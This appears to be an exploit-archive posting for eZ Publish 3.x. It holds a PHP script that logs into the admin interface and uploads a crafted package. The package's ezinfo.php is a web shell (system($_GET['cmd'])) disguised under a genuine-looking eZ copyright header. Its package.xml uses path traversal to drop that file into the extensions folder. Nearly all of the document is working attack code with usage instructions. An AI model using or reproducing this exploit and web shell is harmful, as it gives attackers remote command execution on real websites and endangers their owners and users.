|
// eZPublish_abuse_of_functionality_zero_day.php
--------------------------------------------------------------
<?php
/*
eZ Publish OS Commanding executing exploit by s4avrd0w [s4avrd0w@p0c.ru]
Versions affected 3.x
* tested on version 3.9.0, 3.9.5, 3.10.1
usage:
# ./eZPublish_abuse_of_functionality_zero_day -u=username -p=password -s=EZPublish_server
The options are required:
-u Login of the exists admin on eZ Publish
-p Admin password on eZ Publish
-s Target eZ Publish admin interface
example:
# ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/
[+] Exploit successfully sending
[+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand>
*/
function help_argc($script_name)
{
print "
usage:
# ./".$script_name." -u=username -p=password -s=EZPublish_server
The options are required:
-u Login of the new admin on eZ Publish
-p Password of the new admin on eZ Publish
-s Target eZ Publish admin interface
example:
# ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/
[+] Exploit successfully sending
[+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand>
";
}
function successfully($server)
{
$server = substr($server,7,strpos($server,"/",7)-7);
print "
[+] Exploit successfully sending
[+] For OS Commanding executing go to: http://$server/ezinfo/about?cmd=<OScommand>
";
}
if ($argc != 4 || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
help_argc($argv[0]);
exit(0);
}
else
{
$ARG = array();
foreach ($argv as $arg) {
if (strpos($arg, '-') === 0) {
$key = substr($arg,1,1);
if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
}
}
if ($ARG[u] && $ARG[p] && $ARG[s])
{
if (file_exists("ez_exploit.ezpkg"))
{
$post_login_fields = array(
'Login' => $ARG[u],
'Password' => $ARG[p],
'LoginButton' => '1',
'RedirectURI' => ''
);
$headers = array(
'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
'Referer' => $ARG[s]
);
$res_http = new HttpRequest($ARG[s]."/user/login", HttpRequest::METH_POST);
$res_http->addPostFields($post_login_fields);
$res_http->addHeaders($headers);
try {
$http_response = $res_http->send();
if (eregi("message-warning", $http_response->getBody()))
{
print "[-] Login failed";
exit(0);
}
else
{
$http_headers = $http_response->getHeaders();
if ($http_headers['Set-Cookie'])
{
$eZcookie = explode(";",$http_headers['Set-Cookie']);
$eZadmcookie = explode("=",$eZcookie[0]);
$cookies = array(
$eZadmcookie[0] => $eZadmcookie[1]
);
$post_fields = array(
'MAX_FILE_SIZE' => '32000000',
'UploadPackageButton' => '1'
);
$res_http = new HttpRequest($ARG[s]."/package/upload", HttpRequest::METH_POST);
$res_http->addPostFields($post_fields);
$res_http->addHeaders($headers);
$res_http->addCookies($cookies);
$res_http->addPostFile("PackageBinaryFile","ez_exploit.ezpkg","multipart/form-data");
try {
$http_response = $res_http->send();
if (!eregi("UploadPackageButton", $http_response->getBody()))
{
successfully($ARG[s]);
}
else
{
print "[-] Exploit failed";
}
} catch (HttpException $exception) {
print "[-] Not connected";
exit(0);
}
}
else
{
print "[-] Error get cookie";
}
}
} catch (HttpException $exception) {
print "[-] Not connected";
exit(0);
}
}
else
{
print "[-] File ez_exploit.ezpkg not found\n";
print "[-] Exploit failed";
}
}
else
{
help_argc($argv[0]);
exit(0);
}
}
?>
-------------------------------------------------------------
//ezinfo.php
-------------------------------------------------------------
<?php
print "<pre>";
system($_GET['cmd']);
print "</pre>";
//
// SOFTWARE NAME: eZ publish
// SOFTWARE RELEASE: 3.9.0
// BUILD VERSION: 17785
// COPYRIGHT NOTICE: Copyright (C) 1999-2006 eZ systems AS
// SOFTWARE LICENSE: GNU General Public License v2.0
// NOTICE: >
// This program is free software; you can redistribute it and/or
// modify it under the terms of version 2.0 of the GNU General
// Public License as published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of version 2.0 of the GNU General
// Public License along with this program; if not, write to the Free
// Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
// MA 02110-1301, USA.
//
//
class ezdhtmlInfo
{
function info()
{
return array( 'Name' => "eZ Online Editor",
'Version' => "4.2",
'Copyright' => "Copyright (C) 1999-2006 eZ systems AS",
'License' => "GNU General Public License v2.0",
);
}
}
?>
---------------------------------------------------------------------------------
//package.xml
---------------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<package version="3.8.0"
development="false"
is_active="true"
install_type="import">
<name>../../../../extension/ezdhtml</name>
<summary>Website Interface</summary>
<description>Website Interface is a web based CMS solution based on eZ Publish. It contains templates and settings that meets the most common requirements for content management systems.</description>
<vendor>eZ systems</vendor>
<type value="site" />
<ezpublish>
<version>3.8.0</version>
<named-version>3.8</named-version>
</ezpublish>
<maintainers>
<maintainer>
<name>Administrator User</name>
<email>nospam@ez.no</email>
<role>lead</role>
</maintainer>
</maintainers>
<packaging>
<timestamp>1153313252</timestamp>
<host>packages.jkn.ez.no</host>
</packaging>
<documents>
<document mime-type="text/plain"
name="LICENCE" />
</documents>
<changelog>
<entry person="Administrator User"
email="nospam@ez.no"
release="1">
<change>Creation of package.</change>
</entry>
</changelog>
</package>
------------------------------------------------------------------------------------------------
|
推荐
评论(0条)
